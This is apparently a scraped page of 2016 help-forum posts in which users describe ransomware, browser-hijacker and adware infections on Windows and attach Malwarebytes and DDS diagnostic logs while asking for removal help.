2016-11-02 10:47:26 47104 ----a-w- C:\WINDOWS\SysWow64\Windows.Shell.Search.UriHandler.dll
2016-11-02 10:47:04 285184 ----a-w- C:\WINDOWS\SysWow64\Windows.UI.BlockedShutdown.dll
2016-11-02 10:46:26 140288 ----a-w- C:\WINDOWS\SysWow64\AppCapture.dll
2016-11-02 10:45:49 253952 ----a-w- C:\WINDOWS\SysWow64\Windows.UI.BioFeedback.dll
2016-11-02 10:45:37 331776 ----a-w- C:\WINDOWS\apppatch\AcLayers.dll
2016-11-02 10:45:17 492032 ----a-w- C:\WINDOWS\SysWow64\bcastdvr.exe
2016-11-02 10:45:09 182784 ----a-w- C:\WINDOWS\SysWow64\mfsensorgroup.dll
2016-11-02 10:44:50 231936 ----a-w- C:\WINDOWS\SysWow64\Windows.ApplicationModel.LockScreen.dll
2016-11-02 10:44:45 180224 ----a-w- C:\WINDOWS\SysWow64\InstallAgent.exe
2016-11-02 10:44:34 89088 ----a-w- C:\WINDOWS\SysWow64\AuthExt.dll
2016-11-02 10:43:53 557568 ----a-w- C:\WINDOWS\SysWow64\StoreAgent.dll
2016-11-02 10:43:43 198144 ----a-w- C:\WINDOWS\SysWow64\FSClient.dll
2016-11-02 10:43:29 731136 ----a-w- C:\WINDOWS\SysWow64\d3d8.dll
2016-11-02 10:42:55 549376 ----a-w- C:\WINDOWS\SysWow64\ActionCenterCPL.dll
2016-11-02 10:42:48 223232 ----a-w- C:\WINDOWS\SysWow64\InstallAgentUserBroker.exe
2016-11-02 10:42:44 306176 ----a-w- C:\WINDOWS\SysWow64\ieproxy.dll
2016-11-02 10:42:35 202752 ----a-w- C:\WINDOWS\SysWow64\Windows.Devices.HumanInterfaceDevice.dll
2016-11-02 10:42:32 866816 ----a-w- C:\WINDOWS\SysWow64\Windows.UI.Cred.dll
2016-11-02 10:42:22 506880 ----a-w- C:\WINDOWS\SysWow64\DevicePairing.dll
2016-11-02 10:42:19 632832 ----a-w- C:\WINDOWS\SysWow64\sud.dll
2016-11-02 10:41:26 635904 ----a-w- C:\WINDOWS\SysWow64\jscript9diag.dll
2016-11-02 10:40:36 896512 ----a-w- C:\WINDOWS\SysWow64\fontext.dll
2016-11-02 10:40:34 198656 ----a-w- C:\WINDOWS\SysWow64\indexeddbserver.dll
2016-11-02 10:40:21 548352 ----a-w- C:\WINDOWS\SysWow64\ddraw.dll
2016-11-02 10:39:53 236544 ----a-w- C:\WINDOWS\SysWow64\UIAnimation.dll
2016-11-02 10:39:24 348672 ----a-w- C:\WINDOWS\SysWow64\zipfldr.dll
2016-11-02 10:39:06 465920 ----a-w- C:\WINDOWS\SysWow64\LockAppBroker.dll
2016-11-02 10:38:52 760832 ----a-w- C:\WINDOWS\SysWow64\appwiz.cpl
2016-11-02 10:38:35 22563840 ----a-w- C:\WINDOWS\System32\edgehtml.dll
2016-11-02 10:37:46 19415040 ----a-w- C:\WINDOWS\SysWow64\edgehtml.dll
2016-11-02 10:37:08 299008 ----a-w- C:\WINDOWS\System32\rdpinit.exe
2016-11-02 10:36:53 415744 ----a-w- C:\WINDOWS\System32\rdpshell.exe
2016-11-02 10:36:34 7626752 ----a-w- C:\WINDOWS\SysWow64\twinui.dll
2016-11-02 10:36:05 63488 ----a-w- C:\WINDOWS\SysWow64\ErrorDetailsUpdate.dll
2016-11-02 10:35:13 336896 ----a-w- C:\WINDOWS\SysWow64\msinfo32.exe
2016-11-02 10:34:44 327168 ----a-w- C:\WINDOWS\System32\microsoft-windows-system-events.dll
2016-11-02 10:34:23 43008 ----a-w- C:\WINDOWS\System32\LaunchWinApp.exe
2016-11-02 10:34:11 15360 ----a-w- C:\WINDOWS\apppatch\apppatch64\AcXtrnal.dll
2016-11-02 10:33:56 206848 ----a-w- C:\WINDOWS\System32\win32k.sys
2016-11-02 10:33:48 3307520 ----a-w- C:\WINDOWS\SysWow64\MFMediaEngine.dll
2016-11-02 10:33:42 32768 ----a-w- C:\WINDOWS\apppatch\apppatch64\AcWinRT.dll
.
============= FINISH: 2:47:21.16 ===============

Attached Files

attach.txt (17.3 KB)

↧

I can get rid of this pop up browser bar ive tried everything i know

November 27, 2016, 1:15 pm

≫ Next: Ransomware

≪ Previous: Pop up ad problem Firefox Chrome and Edge probably

Hi guys when i try typing on google or anything it jumps to a pop up toolbar but i cant find anything unusual install or anything odd in my files just wondering if you knew what it was, ive tried all the free malware tools but nothing..

also this pop up happens all the time 27.11.2016 21.08.39;Dangerous URL blocked;Redirect listed in database of malicious URLs;Google Chrome;11/27/2016 21:08:39

↧

Ransomware

November 28, 2016, 3:51 pm

≫ Next: Windows 10 Chrome - "YourTV" Browser hijacker won't go away

≪ Previous: I can get rid of this pop up browser bar ive tried everything i know

I believe my computer has been infected with ransomware called Locky. It has encrypted all of my Word files, and there's a ransom note. I have no intention of paying the blackmailers, and am hoping someone here might know how to deal with the problem. There are companies purporting to have remedies, but I have no idea whether or not any of them are effective, or not. Any help will be appreciated. Here are screenshots of the .doc properties, the page identifying the malware, and the ransom note. Thanks in advance.

Attached Thumbnails

Click image for larger version

Name: WordFail.jpg
Views: N/A
Size: 105.3 KB
ID: 296801

Click image for larger version

Name: LockyID.jpg
Views: N/A
Size: 219.8 KB
ID: 296809

Click image for larger version

Name: RansomNote.jpg
Views: N/A
Size: 187.1 KB
ID: 296817

↧

Windows 10 Chrome - "YourTV" Browser hijacker won't go away

November 30, 2016, 10:15 pm

≫ Next: Infected by osiris ransomware

≪ Previous: Ransomware

So, around early yesterday I noticed that my Google Chrome has been infected with one of those scumbag browser hijackers, one by the innocent name of "YourTV". What the program does is forcibly changes my homepage and default search engine to some broken, ad-spammed version of Google, prevents me from changing my default search engine (my computer insists that the current one is "enforced by the administrator") or default home page (the changes here are made through a registry file and editing Chrome settings does nothing to fix it.) As well as various other irritating things.

Now, after googling the issue, it seemed that removing this hijacker from my computer should be a fairly straightforward matter: Delete any potentially suspicious files from the computer, reset Chrome settings, scan with Malwarebytes, badda-boom-badda-bing, done.

Or so I thought...

I've been running into a lot of issues regarding this software and I'm starting to get very, very frustrated.

I'll list all the things that I've tried that haven't worked:

Searching for suspicious programs or files - I haven't installed anything to my memory since this hijacker showed up, and there are no odd or suspicious programs that I can locate through conventional search methods.
Resetting Chrome's settings - This does literally nothing.
Deleting registry entries referring to the hijacker - Again, does nothing.
Scanning with Windows Defender - Doesn't detect anything.
Scanning with Malwarebytes - This does detect the YourTV crap on my computer and removes it accordingly, but the moment I boot up Chrome again, it comes right back.
Booting my computer in Safe Mode and then doing a full, no-holds-barred custom scan with Malwarebytes - Again, this detected the same files (which I must have deleted about 4 times now) but again, coming back online on Chrome brings this scumbag of a program right back.
Removing the malware with Malwarebytes then reinstalling Chrome - A fresh install did approximately nothing to fix the issue.

Can somebody please help me? I'm at my wits end here and I get more and more frustrated the more I see just how offensively deep this hijack program has gotten its claws into my computer.

Also, it's worth mentioning that when I scan with Malwarebytes, it picks up a trojan software piece hiding in "C:\ProgramData\Mozilla\Mozilla Firefox"... The weird thing about this? Well, excluding the fact that I've never actually installed Firefox on this computer once in its lifetime, I also can't ever seem to find this folder on my own. Neither before nor after Malwarebytes picks it up.

And just in case it helps, here's a full log of what Malwarebytes picks up every time I scan:

Code:

Malwarebytes Anti-Malware

www.malwarebytes.org



Scan Date: 1/12/2016

Scan Time: 1:57 PM

Logfile: log.txt

Administrator: Yes



Version: 2.2.1.1043

Malware Database: v2016.12.01.03

Rootkit Database: v2016.11.20.01

License: Free

Malware Protection: Disabled

Malicious Website Protection: Disabled

Self-protection: Disabled



OS: Windows 10

CPU: x64

File System: NTFS

User: nszme



Scan Type: Threat Scan

Result: Completed

Objects Scanned: 362649

Time Elapsed: 4 min, 59 sec



Memory: Enabled

Startup: Enabled

Filesystem: Enabled

Archives: Enabled

Rootkits: Disabled

Heuristics: Enabled

PUP: Enabled

PUM: Enabled



Processes: 0

(No malicious items detected)



Modules: 0

(No malicious items detected)



Registry Keys: 1

PUP.Optional.YourTV.ChrPRST, HKU\S-1-5-21-2845599095-3938741188-173153177-1001\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{0633EE93-D776-472F-A0FF-E1416B8B2E3A}, , [889fab37673352e46178334649b922de], 



Registry Values: 1

PUP.Optional.YourTV.ChrPRST, HKU\S-1-5-21-2845599095-3938741188-173153177-1001\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}|URL, http://www.google.com/cse?cx=partner-pub-8036109189802438[889fab37673352e46178334649b922de]A7790813904&ie=UTF-8&q={searchTerms}&sa=Search&siteurl=yourtv.linkF, %4, %5



Registry Data: 1

PUP.Optional.YourTV.ChrPRST, HKU\S-1-5-21-2845599095-3938741188-173153177-1001\SOFTWARE\MICROSOFT\INTERNET EXPLORER\MAIN|Start Page, http://yourtv.link, Good: (www.google.com), Bad: (http://yourtv.link),,[66c16f7323771620d01902225aa933cd]



Folders: 0

(No malicious items detected)



Files: 1

Trojan.Agent, C:\ProgramData\Mozilla\Mozilla Firefox.exe, , [d255667c8e0c91a51b4cc24709f9e61a], 



Physical Sectors: 0

(No malicious items detected)





(end)

It's always those four files. One trojan, 3 PUPs, and deleting them just seems to make them come back the next time I start up Chrome.

Interestingly, though, this hijacker doesn't seem to be affecting Microsoft Edge, for whatever reason...

Anyways, if anybody could help me out, I'd be greatly appreciative.

Thank you!

↧

Infected by osiris ransomware

December 20, 2016, 2:27 am

≫ Next: Win32/Zperm virus & popups.

≪ Previous: Windows 10 Chrome - "YourTV" Browser hijacker won't go away

I have received this Osiris ransomware on my computer and it has encrypted my photo's where I can't open them. I follow the manual guide to get rid of the annoying thing but it seems no work. Any better effective guide? Please anyone help.

↧

Win32/Zperm virus & popups.

December 22, 2016, 10:35 am

≫ Next: Flash® Player for YouTube has been updated

≪ Previous: Infected by osiris ransomware

My AVG anti virus has been periodically flagging with a 'threat' called win32/zperm. It appears to be in C:\Windows\temp\ I always click remove it and it says its successful but periodically it returns.

I also have the issue of various popups while browsing the internet in Firefox (Its the only browser I use). Anything from this computer has been locked due to suspicious activity call this number to reactivate to various random popups.

Before coming here I've tried updating + running in safe mode AVG Anti Virus. Malware bytes, Spybot S&D and Adaware. They either don't find a threat or one of them find 'tracking cookies' which it removes but doesn't fix the problem.

I ran DDS and attached the two required text files. I've moved since I purchased this computers so I'm not entirely sure where my Window's disk is. I'm on Windows 10 Home 64bit if it matters. Any help would be appreciated, thanks.

DDS (Ver_2012-11-20.01) - NTFS_AMD64
Internet Explorer: 11.0.14393.0 BrowserJavaVersion: 11.91.2
Run by Nicholas at 12:28:54 on 2016-12-22
Microsoft Windows 10 Home 10.0.14393.0.1252.1.1033.18.8102.2929 [GMT -6:00]
.
AV: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: AVG AntiVirus Free Edition *Enabled/Updated* {4D41356F-32AD-7C42-C820-63775EE4F413}
SP: Spybot - Search and Destroy *Enabled/Outdated* {A16C3F68-9280-E053-1818-342707FECF4D}
SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
SP: AVG AntiVirus Free Edition *Enabled/Updated* {F620D48B-1497-73CC-F290-58052563BEAE}
.
============== Running Processes ===============
.
c:\PROGRA~2\AVG\Av\avgrsa.exe
C:\Program Files (x86)\AVG\Av\avgcsrva.exe
C:\WINDOWS\system32\svchost.exe -k DcomLaunch
C:\WINDOWS\system32\svchost.exe -k RPCSS
C:\WINDOWS\system32\dwm.exe
C:\WINDOWS\system32\svchost.exe -k LocalService
C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\WINDOWS\system32\svchost.exe -k LocalServiceNetworkRestricted
C:\WINDOWS\system32\svchost.exe -k LocalServiceNoNetwork
C:\Program Files (x86)\AVG Web TuneUp\WtuSystemSupport.exe
C:\WINDOWS\System32\svchost.exe -k NetworkService
C:\WINDOWS\system32\svchost.exe -k netsvcs
C:\WINDOWS\system32\igfxCUIService.exe
C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\WINDOWS\system32\svchost.exe -k LocalServiceNetworkRestricted
C:\WINDOWS\system32\svchost.exe -k LocalSystemNetworkRestricted
C:\WINDOWS\System32\spoolsv.exe
C:\WINDOWS\system32\WLANExt.exe
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
C:\Program Files (x86)\ASUS\WebStorage\2.0.3.226\AsusWSWinService.exe
C:\WINDOWS\System32\svchost.exe -k utcsvc
C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\Program Files (x86)\AVG\Framework\Common\avgsvca.exe
C:\WINDOWS\system32\BtwRSupportService.exe
C:\Program Files (x86)\AVG\Av\avgwdsvca.exe
C:\Program Files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.14.1023.10544\AdAwareService.exe
C:\Program Files\Intel\iCLS Client\HeciServer.exe
C:\WINDOWS\system32\DptfPolicyCriticalService.exe
C:\WINDOWS\system32\DptfPolicyConfigTDPService.exe
C:\WINDOWS\system32\DptfParticipantProcessorService.exe
C:\Program Files\CyberLink\Shared files\RichVideo64.exe
C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe
C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe
C:\WINDOWS\system32\svchost.exe -k appmodel
C:\Program Files (x86)\Common Files\AVG Secure Search\vToolbarUpdater\40.3.6\ToolbarUpdater.exe
C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe
C:\Program Files (x86)\AVG\Av\avgnsa.exe
C:\Program Files (x86)\AVG\Av\avgemca.exe
C:\WINDOWS\system32\svchost.exe -k NetworkServiceNetworkRestricted
C:\WINDOWS\system32\svchost.exe -k LocalServiceAndNoImpersonation
C:\Program Files (x86)\Common Files\MAGIX Services\Database\bin\FABS.exe
C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe
C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
C:\WINDOWS\system32\SearchIndexer.exe
C:\WINDOWS\system32\sihost.exe
C:\WINDOWS\system32\svchost.exe -k UnistackSvcGroup
C:\WINDOWS\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe
C:\Windows\System32\RuntimeBroker.exe
C:\Program Files (x86)\ASUS\ASUS Manager\Application Update\ASUSUpdateChecker.exe
C:\Program Files (x86)\ASUS\ASUS Manager\Power Manager\Power Manager_background.exe
C:\Program Files (x86)\InstallShield Installation Information\{9AF45D7C-34F1-4BA0-B799-825C8C04494C}\AiChargerDT.exe
C:\WINDOWS\system32\taskhostw.exe
C:\Program Files (x86)\ASUS\ASUS Manager\AsHKService.exe
C:\Program Files (x86)\ASUS\ASUS Manager\Ai Charger II\Ai_ChargerII_TrayIcon(ASUS_Manager).exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\igfxEM.exe
C:\WINDOWS\system32\igfxHK.exe
C:\WINDOWS\system32\igfxTray.exe
C:\WINDOWS\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe
C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
C:\Program Files (x86)\ASUS\ASUS Key Suite\AsKeySuite.exe
C:\Program Files\Common Files\microsoft shared\ink\TabTip.exe
C:\Program Files (x86)\Common Files\Microsoft Shared\Ink\TabTip32.exe
C:\WINDOWS\system32\wbem\wmiprvse.exe
C:\WINDOWS\system32\SettingSyncHost.exe
C:\WINDOWS\system32\wbem\unsecapp.exe
C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
C:\Program Files\iTunes\iTunesHelper.exe
C:\Program Files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.14.1023.10544\AdAwareTray.exe
C:\Program Files\iPod\bin\iPodService.exe
C:\WINDOWS\system32\fontdrvhost.exe
C:\Program Files (x86)\CyberLink\PowerDVD10\PDVD10Serv.exe
C:\Program Files (x86)\AVG\Av\avgui.exe
C:\Program Files (x86)\AVG\Framework\Common\avguix.exe
C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe
C:\Program Files (x86)\AVG Web TuneUp\vprot.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files (x86)\ASUS\WebStorage\2.0.3.226\AsusWSPanel.exe
C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe
C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.10.145.0_x64__kzf8qxf38zg5c\SkypeHost.exe
C:\WINDOWS\system32\ApplicationFrameHost.exe
C:\Program Files\WindowsApps\Microsoft.Getstarted_4.2.29.0_x64__8wekyb3d8bbwe\WhatsNew.Store.exe
C:\WINDOWS\system32\taskhostw.exe
C:\Windows\System32\SystemSettingsBroker.exe
C:\Program Files\WindowsApps\Microsoft.BingNews_4.18.37.0_x86__8wekyb3d8bbwe\Microsoft.Msn.News.exe
C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7714.42037.0_x64__8wekyb3d8bbwe\HxCalendarAppImm.exe
C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7714.42037.0_x64__8wekyb3d8bbwe\HxTsr.exe
C:\Users\Nicholas\AppData\Local\Microsoft\OneDrive\OneDrive.exe
C:\WINDOWS\system32\dashost.exe
C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1612.3341.0_x64__8wekyb3d8bbwe\Calculator.exe
C:\WINDOWS\System32\sdiagnhost.exe
C:\Program Files\WindowsApps\Microsoft.Windows.Photos_16.1118.10000.0_x64__8wekyb3d8bbwe\Microsoft.Photos.exe
C:\Program Files\WindowsApps\Microsoft.XboxApp_24.24.20004.0_x64__8wekyb3d8bbwe\XboxApp.exe
C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.16112.10221.0_x64__8wekyb3d8bbwe\Video.UI.exe
C:\Program Files (x86)\Mozilla Firefox\firefox.exe
C:\WINDOWS\system32\AUDIODG.EXE
C:\Windows\System32\smartscreen.exe
svchost.exe
C:\WINDOWS\system32\SearchProtocolHost.exe
C:\WINDOWS\system32\SearchFilterHost.exe
C:\WINDOWS\system32\wbem\wmiprvse.exe
C:\WINDOWS\System32\cscript.exe
.
============== Pseudo HJT Report ===============
.
uStart Page = hxxps://mysearch.avg.com/?cid={157D7AC9-D0D0-481F-A902-B516EE3FECF4}&mid=3cb132cf36e047cda1d2856e5810e0fe-b77f08a324e953ddc3fee54571f6df06071efe63&lang=en&ds=AVG&coid=avgtbavg&cmpid=1116av&pr=fr&d=2015-07-16 12:21:27&v=4.3.6.255&pid=wtu&sg=&sap=hp
BHO: Java(tm) Plug-In SSV Helper: {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre1.8.0_91\bin\ssv.dll
BHO: AVG Web TuneUp: {95B7759C-8C7F-4BF1-B163-73684A933233} - C:\Program Files (x86)\AVG Web TuneUp\4.3.6.255\AVG Web TuneUp.dll
BHO: Java(tm) Plug-In 2 SSV Helper: {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre1.8.0_91\bin\jp2ssv.dll
uRun: [OneDrive] "C:\Users\Nicholas\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
uRun: [SpybotPostWindows10UpgradeReInstall] "C:\Program Files\Common Files\AV\Spybot - Search and Destroy\Test.exe"
uRunOnce: [Uninstall 17.3.6517.0809_1\amd64] C:\WINDOWS\System32\cmd.exe /q /c rmdir /s /q "C:\Users\Nicholas\AppData\Local\Microsoft\OneDrive\17.3.6517.0809_1\amd64"
uRunOnce: [Uninstall 17.3.6517.0809_1] C:\WINDOWS\System32\cmd.exe /q /c rmdir /s /q "C:\Users\Nicholas\AppData\Local\Microsoft\OneDrive\17.3.6517.0809_1"
mRun: [ASUSPRP] "C:\Program Files (x86)\ASUS\APRP\APRP.EXE"
mRun: [WebStorage] C:\Program Files (x86)\ASUS\WebStorage\2.0.3.226\ASUSWSLoader.exe
mRun: [RemoteControl10] "C:\Program Files (x86)\CyberLink\PowerDVD10\PDVD10Serv.exe"
mRun: [DivXMediaServer] C:\Program Files (x86)\DivX\DivX Media Server\DivXMediaServer.exe
mRun: [AVG_UI] "C:\Program Files (x86)\AVG\Framework\Common\avguirna.exe" /lps=av
mRun: [AvgUi] "C:\Program Files (x86)\AVG\Framework\Common\avguirna.exe" /lps=fmw
mRun: [SunJavaUpdateSched] "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
mRun: [SDTray] "C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe"
mRun: [vProt] "C:\Program Files (x86)\AVG Web TuneUp\vprot.exe"
dRunOnce: [Application Restart #1] C:\Program Files\Common Files\microsoft shared\ink\TabTip.exe /Crashed
mPolicies-System: DSCAutomationHostEnabled = dword:2
TCP: NameServer = 192.168.1.254
TCP: Interfaces\{548618f6-a406-4e10-834b-9f87371363d5} : DHCPNameServer = 127.0.0.1
TCP: Interfaces\{77123f7f-96e7-4422-9e25-6ecb601d7a1a} : DHCPNameServer = 192.168.1.254
Handler: tbauth - {14654CA6-5711-491D-B89A-58E571679951} - C:\Windows\SysWOW64\tbauth.dll
Handler: windows.tbauth - {14654CA6-5711-491D-B89A-58E571679951} - C:\Windows\SysWOW64\tbauth.dll
Handler: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - C:\Program Files (x86)\Windows Live\Photo Gallery\AlbumDownloadProtocolHandler.dll
Notify: SDWinLogon - SDWinLogon.dll
SSODL: WebCheck - <orphaned>
LSA: Security Packages = ""
mASetup: {8A69D345-D564-463c-AFF1-A69D9E530F96} - "C:\Program Files (x86)\Google\Chrome\Application\55.0.2883.87\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --multi-install --chrome
CLSID: {603D3801-BD81-11d0-A3A5-00C04FD706EC} - C:\WINDOWS\System32\windows.storage.dll
x64-mStart Page = about:blank
x64-BHO: AVG Web TuneUp: {95B7759C-8C7F-4BF1-B163-73684A933233} - C:\Program Files\AVG Web TuneUp\4.3.6.255\AVG Web TuneUp.dll
x64-Run: [RTHDVCPL] "C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe" -s
x64-Run: [RtHDVBg] "C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe" /MAXX4
x64-Run: [DptfPolicyLpmServiceHelper] C:\WINDOWS\System32\DptfPolicyLpmServiceHelper.exe
x64-Run: [IgfxTray] "C:\WINDOWS\System32\igfxtray.exe"
x64-Run: [iTunesHelper] "C:\Program Files\iTunes\iTunesHelper.exe"
x64-Run: [Logitech Download Assistant] C:\WINDOWS\System32\rundll32.exe C:\WINDOWS\System32\LogiLDA.dll,LogiFetch
x64-Run: [AdAwareTray] "C:\Program Files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.14.1023.10544\AdAwareTray.exe"
x64-mPolicies-System: DSCAutomationHostEnabled = dword:2
x64-Handler: tbauth - {14654CA6-5711-491D-B89A-58E571679951} - C:\WINDOWS\System32\tbauth.dll
x64-Handler: windows.tbauth - {14654CA6-5711-491D-B89A-58E571679951} - C:\WINDOWS\System32\tbauth.dll
x64-Handler: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - <orphaned>
x64-SSODL: WebCheck - <orphaned>
x64-mASetup: {2C7339CF-2B09-4501-B3F3-F3508C9228ED} - /UserInstall
x64-mASetup: {89820200-ECBD-11cf-8B85-00AA005B4340} - U
x64-CLSID: {603D3801-BD81-11d0-A3A5-00C04FD706EC} - C:\WINDOWS\System32\windows.storage.dll
.
================= FIREFOX ===================
.
FF - ProfilePath - C:\Users\Nicholas\AppData\Roaming\Mozilla\Firefox\Profiles\snvw6azb.default\
FF - prefs.js: browser.startup.homepage - about:home
FF - plugin: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll
FF - plugin: C:\Program Files (x86)\DivX\DivX OVS Helper\npovshelper.dll
FF - plugin: C:\Program Files (x86)\Google\Google Earth\plugin\npgeplugin.dll
FF - plugin: C:\Program Files (x86)\Google\Update\1.3.32.7\npGoogleUpdate3.dll
FF - plugin: C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll
FF - plugin: C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll
FF - plugin: C:\Program Files (x86)\Java\jre1.8.0_91\bin\dtplugin\npdeployJava1.dll
FF - plugin: C:\Program Files (x86)\Java\jre1.8.0_91\bin\plugin2\npjp2.dll
FF - plugin: c:\Program Files (x86)\Microsoft Silverlight\5.1.50901.0\npctrlui.dll
FF - plugin: C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll
FF - plugin: C:\WINDOWS\SysWoW64\Macromed\Flash\NPSWF32_24_0_0_186.dll
.
============= SERVICES / DRIVERS ===============
.
R0 AVGIDSHA;AVGIDSHA;C:\WINDOWS\System32\drivers\avgidsha.sys [2015-5-12 267008]
R0 Avgloga;AVG Logging Driver;C:\WINDOWS\System32\drivers\avgloga.sys [2016-2-16 360736]
R0 Avgmfx64;AVG Mini-Filter Resident Anti-Virus Shield;C:\WINDOWS\System32\drivers\avgmfx64.sys [2016-9-26 254208]
R0 Avgrkx64;AVG Anti-Rootkit Driver;C:\WINDOWS\System32\drivers\avgrkx64.sys [2015-3-20 52992]
R0 Avguniva;AVG Universal Driver;C:\WINDOWS\System32\drivers\avguniva.sys [2016-1-8 77056]
R0 intelpep;Intel(R) Power Engine Plug-in Driver;C:\WINDOWS\System32\drivers\intelpep.sys [2016-7-16 48152]
R0 iorate;iorate;C:\WINDOWS\System32\drivers\iorate.sys [2016-11-8 48992]
R0 volume;Volume driver;C:\WINDOWS\System32\drivers\volume.sys [2016-7-16 16224]
R0 WindowsTrustedRT;Windows Trusted Execution Environment Class Extension;C:\WINDOWS\System32\drivers\WindowsTrustedRT.sys [2016-7-16 107032]
R0 WindowsTrustedRTProxy;Microsoft Windows Trusted Runtime Secure Service;C:\WINDOWS\System32\drivers\WindowsTrustedRTProxy.sys [2016-7-16 17944]
R0 Wof;Windows Overlay File System Filter Driver;C:\WINDOWS\System32\drivers\wof.sys [2016-9-25 199008]
R1 ahcache;Application Compatibility Cache;C:\WINDOWS\System32\drivers\ahcache.sys [2016-10-27 227328]
R1 Avgdiska;AVG Disk Driver;C:\WINDOWS\System32\drivers\avgdiska.sys [2016-5-13 163072]
R1 AVGIDSDriver;AVGIDSDriver;C:\WINDOWS\System32\drivers\avgidsdrivera.sys [2016-10-17 312576]
R1 Avgldx64;AVG AVI Loader Driver;C:\WINDOWS\System32\drivers\avgldx64.sys [2016-10-19 267520]
R1 Avgwfpa;AVG Firewall Driver;C:\WINDOWS\System32\drivers\avgwfpa.sys [2016-8-4 313096]
R1 FileCrypt;FileCrypt;C:\WINDOWS\System32\drivers\filecrypt.sys [2016-7-16 88576]
R1 GpuEnergyDrv;GPU Energy Driver;C:\WINDOWS\System32\drivers\gpuenergydrv.sys [2016-7-16 8192]
R2 Apple Mobile Device Service;Apple Mobile Device Service;C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [2015-9-2 77104]
R2 Asus WebStorage Windows Service;Asus WebStorage Windows Service;C:\Program Files (x86)\ASUS\WebStorage\2.0.3.226\AsusWSWinService.exe [2013-8-16 71680]
R2 AVGIDSAgent;AVGIDSAgent;C:\Program Files (x86)\AVG\Av\avgidsagenta.exe [2016-11-2 5337696]
R2 avgsvc;AVG Service;C:\Program Files (x86)\AVG\Framework\Common\avgsvca.exe [2016-12-6 1146128]
R2 avgwd;AVG WatchDog;C:\Program Files (x86)\AVG\Av\avgwdsvca.exe [2016-11-2 727512]
R2 BcmBtRSupport;Bluetooth Driver Management Service;C:\WINDOWS\System32\BtwRSupportService.exe [2015-3-27 2251992]
R2 CDPSvc;Connected Devices Platform Service;C:\WINDOWS\System32\svchost.exe -k LocalService [2016-7-16 44496]
R2 CDPUserSvc_206b8d;CDPUserSvc_206b8d;C:\WINDOWS\System32\svchost.exe -k UnistackSvcGroup [2016-7-16 44496]
R2 clreg;Virtual Registry for Containers;C:\WINDOWS\System32\drivers\registry.sys [2016-7-16 70144]
R2 CoreMessagingRegistrar;CoreMessaging;C:\WINDOWS\System32\svchost.exe -k LocalServiceNoNetwork [2016-7-16 44496]
R2 DiagTrack;Connected User Experiences and Telemetry;C:\WINDOWS\System32\svchost.exe -k utcsvc [2016-7-16 44496]
R2 DptfParticipantProcessorService;Intel(R) Dynamic Platform and Thermal Framework Processor Participant Service Application;C:\WINDOWS\System32\DptfParticipantProcessorService.exe [2013-12-2 115656]
R2 DptfPolicyConfigTDPService;Intel(R) Dynamic Platform and Thermal Framework Config TDP Service Application;C:\WINDOWS\System32\DptfPolicyConfigTDPService.exe [2013-12-2 118728]
R2 DptfPolicyCriticalService;Intel(R) Dynamic Platform and Thermal Framework Critical Service Application;C:\WINDOWS\System32\DptfPolicyCriticalService.exe [2013-12-2 148160]
R2 Fabs;FABS - Helping agent for MAGIX media database;C:\Program Files (x86)\Common Files\MAGIX Services\Database\bin\FABS.exe [2012-1-23 1858048]
R2 igfxCUIService2.0.0.0;Intel(R) HD Graphics Control Panel Service;C:\WINDOWS\System32\igfxCUIService.exe [2016-5-27 374360]
